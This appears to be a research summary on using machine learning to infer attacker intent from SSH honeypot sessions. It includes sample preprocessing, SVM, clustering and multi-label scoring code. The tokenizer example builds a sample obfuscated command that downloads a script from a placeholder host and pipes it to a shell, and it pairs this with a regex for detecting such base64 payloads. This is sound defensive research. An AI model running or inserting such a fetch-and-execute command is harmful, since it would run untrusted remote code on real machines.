Weighted precision 0.999 and recall 0.994 on the test set.
230,000 attacks.
Seven adversary intents.
We analyzed 230,000 real attack sessions collected by decoy servers and compared several machine-learning methods for recognizing what each attacker was trying to do.
Turn unstructured commands into attacker intent.
An SSH honeypot is a decoy server that records the commands sent by attackers. Reading 230,000 sessions by hand is unrealistic, so we tested whether machine learning could summarize the attackers' goals.
We used seven categories based on MITRE ATT&CK, including system discovery, persistence, execution, and impact. One session can contain several goals, so a model may need to assign more than one label.
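As an illustration of what "more than one label" means in practice, a session's goals can be stored as a 0/1 vector with one position per intent. The sketch below is a minimal example, not the study's code: the label names and the `encode_intents` helper are assumptions, and only the four intents named above are included because the remaining three are not listed here.

```python
# Partial label set: only the intents named in the text. The study used seven;
# the remaining category names are not given here, so they are left out.
INTENTS = ["Discovery", "Persistence", "Execution", "Impact"]


def encode_intents(session_intents, intents=INTENTS):
    """Return a 0/1 indicator vector with one position per intent."""
    unknown = set(session_intents) - set(intents)
    if unknown:
        raise ValueError(f"unknown intent(s): {sorted(unknown)}")
    return [1 if name in session_intents else 0 for name in intents]


# Hypothetical session that both inspects the system and installs a foothold.
vector = encode_intents({"Discovery", "Persistence"})
print(vector)  # [1, 1, 0, 0]
```

A model trained on such vectors makes one yes/no decision per intent instead of picking a single winner.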
Prepare the attack data before training a model.
We decoded 90,026 hidden shell scripts, normalized timestamps, separated commands into useful terms, and removed noisy variables and symbols. A statistical text representation then reduced roughly 300,000 candidate terms to 90 useful features.
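The decoding and term-splitting steps might look roughly like the sketch below. It is a sketch under assumptions: the text does not say how the scripts were hidden, so base64 piped through `base64 -d` is assumed here, and the placeholder names (`IPADDR`, `HEXSTR`), the regular expressions, and both helper functions are hypothetical.

```python
import base64
import binascii
import re

# Assumed obfuscation pattern: echo <base64> | base64 -d (or --decode).
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{8,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
)
# Assumed noise: IPv4 addresses and long hex strings, replaced by placeholders.
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
HEX = re.compile(r"\b[0-9a-fA-F]{16,}\b")
# A term starts with a letter or underscore; flags like "-a" lose their dash.
TOKEN = re.compile(r"[A-Za-z_][A-Za-z0-9_.\-]*")


def decode_hidden_script(command):
    """Replace an `echo ... | base64 -d` fragment with its decoded text."""
    def _decode(match):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            return raw.decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            return match.group(0)  # leave undecodable payloads untouched
    return B64_PIPE.sub(_decode, command)


def tokenize(command):
    """Decode hidden payloads, mask noisy values, and return lowercase terms."""
    text = decode_hidden_script(command)
    text = IPV4.sub(" IPADDR ", text)
    text = HEX.sub(" HEXSTR ", text)
    return [tok.lower() for tok in TOKEN.findall(text)]


# Made-up example command, encoded the way the sketch assumes.
payload = base64.b64encode(b"wget http://10.0.0.5/x.sh; chmod +x x.sh").decode()
print(tokenize(f"echo {payload} | base64 -d | sh"))
```

Masking addresses and hashes keeps one-off values from inflating the vocabulary before any statistical weighting is applied.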
System discovery and persistence dominated the dataset, while the Impact category appeared only 27 times. This imbalance became the main weakness of every model: common behavior was easy to learn, but rare behavior was not.
High scores can hide weak categories.
We first tested Random Forest, SVM, and Logistic Regression. Random Forest and SVM performed very well on the common attack categories, and additional parameter tuning produced only a small improvement.
Tuned SVM: RBF kernel, C=100, gamma=scale; approximately 1.48% above baseline.
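In scikit-learn terms, those settings correspond to the configuration sketched below. This assumes scikit-learn was the library used, which the text does not state; the data is synthetic (only the count of 90 features echoes the text), and treating the library defaults as the baseline is an assumption, so the printed scores say nothing about the study's results.

```python
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC

# Synthetic stand-in data: 90 features mirrors the feature count in the text;
# everything else about this dataset is made up for illustration.
X, y = make_classification(
    n_samples=400, n_features=90, n_informative=20, random_state=0
)
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.25, stratify=y, random_state=0
)

# Assumed baseline: scikit-learn defaults (RBF kernel, C=1.0, gamma="scale").
baseline = SVC().fit(X_train, y_train)
# Settings from the text: RBF kernel, C=100, gamma=scale.
tuned = SVC(kernel="rbf", C=100, gamma="scale").fit(X_train, y_train)

print("baseline accuracy:", baseline.score(X_test, y_test))
print("tuned accuracy:   ", tuned.score(X_test, y_test))
```

A larger C penalizes training errors more heavily, which can help on clean data but does nothing for a class with almost no examples.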
Neither result erased the imbalance problem. Impact remained difficult because its support was vanishingly small. Weighted averages describe performance on the dominant classes well, but they should not be mistaken for uniform reliability across every intent.
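A small calculation shows why a weighted average can stay high while one class fails. The numbers below are hypothetical and are not the study's results: only the Impact support of 27 comes from the text, and the other supports and all recall values are invented for illustration.

```python
# Hypothetical per-class results, NOT the study's numbers. Only the Impact
# support of 27 comes from the text; the other values are made up.
per_class = {
    # intent: (support, recall)
    "Discovery": (120_000, 0.999),
    "Persistence": (90_000, 0.998),
    "Execution": (20_000, 0.990),
    "Impact": (27, 0.40),
}


def weighted_recall(stats):
    """Average recall with each class weighted by its number of examples."""
    total = sum(support for support, _ in stats.values())
    return sum(support * recall for support, recall in stats.values()) / total


def macro_recall(stats):
    """Average recall with every class counted equally."""
    return sum(recall for _, recall in stats.values()) / len(stats)


print(f"weighted recall: {weighted_recall(per_class):.4f}")
print(f"macro recall:    {macro_recall(per_class):.4f}")
```

With 27 examples out of several hundred thousand, the rare class contributes almost nothing to the weighted figure, while the macro figure drops sharply. Reporting both, along with per-class scores, makes the weak category visible.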
A good metric did not guarantee useful groups.
We also asked unsupervised models to group similar sessions without using labels. Their internal validation scores looked strong, but visual inspection showed one dominant group and heavy overlap between attacker behaviors.
Some communities were interpretable: BusyBox and mount commands suggested IoT-oriented activity, while chmod, wget, and SSH indicated file modification and persistence. But the overall segmentation was not clean enough to treat clusters as distinct tactics.
The most valuable result was the disagreement between a high silhouette score and weak semantic separation. Validation metrics, visual structure, and domain interpretation all had to be considered together.
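The gap between a high silhouette score and weak semantic separation can be reproduced on a toy example. The sketch below uses made-up 2-D points and hypothetical intent labels: one large, tight cluster mixes two behaviors, and a small distant cluster holds a third. The `silhouette` and `majority_share` helpers are illustrative and are not the study's evaluation code.

```python
from collections import Counter
from math import dist


def silhouette(points, labels):
    """Mean silhouette coefficient with Euclidean distance (pure Python, O(n^2))."""
    clusters = {}
    for p, c in zip(points, labels):
        clusters.setdefault(c, []).append(p)
    scores = []
    for p, c in zip(points, labels):
        own = clusters[c]
        if len(own) == 1:
            scores.append(0.0)  # usual convention for singleton clusters
            continue
        # a: mean distance to the other members of the same cluster.
        a = sum(dist(p, q) for q in own) / (len(own) - 1)
        # b: mean distance to the nearest other cluster.
        b = min(sum(dist(p, q) for q in other) / len(other)
                for k, other in clusters.items() if k != c)
        scores.append((b - a) / max(a, b))
    return sum(scores) / len(scores)


def majority_share(cluster_ids, intents, cluster):
    """Fraction of a cluster's members that carry its most common intent."""
    members = [i for c, i in zip(cluster_ids, intents) if c == cluster]
    return Counter(members).most_common(1)[0][1] / len(members)


# Made-up data: eight points near the origin, two far away.
points = [(0.0, 0.0), (0.1, 0.0), (0.0, 0.1), (0.1, 0.1),
          (0.2, 0.0), (0.0, 0.2), (0.2, 0.1), (0.1, 0.2),
          (10.0, 10.0), (10.1, 10.0)]
cluster_ids = [0] * 8 + [1] * 2
intents = ["Discovery", "Persistence"] * 4 + ["Execution"] * 2

print("silhouette:", round(silhouette(points, cluster_ids), 3))
print("majority share in dominant cluster:", majority_share(cluster_ids, intents, 0))
```

The geometry is clean, so the silhouette is close to 1, yet the dominant cluster is an even mix of two intents. The score measures compactness and separation, not whether the groups mean anything.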
A language model added context, but not missing data.
Finally, we adapted BERT, a pretrained language model, to assign several attack labels to one session. We kept its existing language knowledge fixed and trained a small classification layer on top.
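The multi-label part of this setup lives in the output step: each intent gets its own independent score, so several can be switched on at once. The sketch below shows only that decision step in plain Python, with no BERT involved. The logits are made up, the 0.5 threshold is an assumption, and the label list is partial because only four of the seven intents are named above.

```python
import math

# Partial label set, limited to the intents named in the text.
INTENTS = ["Discovery", "Persistence", "Execution", "Impact"]


def sigmoid(x):
    """Squash a raw score into the range (0, 1)."""
    return 1.0 / (1.0 + math.exp(-x))


def predict_intents(logits, threshold=0.5):
    """Return every intent whose independent probability clears the threshold."""
    probs = [sigmoid(z) for z in logits]
    return [name for name, p in zip(INTENTS, probs) if p >= threshold]


# Made-up logits standing in for the output of the classification layer.
print(predict_intents([2.3, 0.8, -1.5, -4.0]))  # ['Discovery', 'Persistence']
```

Unlike a softmax, the per-label sigmoid does not force the scores to compete, which is what allows one session to carry several labels.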
Precision 0.9974, recall 0.9927, and ROC-AUC 0.9971.
Harmless activity remained harder to distinguish because of limited examples and imbalance.
The experiment showed the value of semantic representations for command sequences, but it also reinforced a broader lesson: a sophisticated model does not compensate for missing class support.
The comparison mattered more than the best score.
Classical supervised models were already highly effective on well-represented intents. Unsupervised methods surfaced broad command communities but struggled to produce semantically distinct attack categories. BERT captured multi-label semantics effectively, while its weakest class exposed the same imbalance found across the study.
The practical next steps go beyond “use a larger model”: introduce domain-aware features and network context, rebalance rare intents, test on broader sources, and evaluate whether results generalize beyond the original June 2019–March 2020 honeypot window.